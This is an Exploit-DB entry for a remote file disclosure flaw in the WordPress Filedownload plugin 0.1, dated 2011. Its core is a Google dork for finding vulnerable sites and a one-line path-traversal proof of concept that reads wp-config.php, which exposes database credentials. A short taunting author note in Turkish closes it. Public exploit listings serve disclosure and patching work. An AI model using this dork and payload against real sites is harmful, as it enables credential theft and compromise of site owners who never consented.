WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure

EDB-ID:

17858

CVE:





Platform:

PHP

Date:

2011-09-19


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1


POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
     

# NOTE: Kendini Birþey Zanneden Velet  Senin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.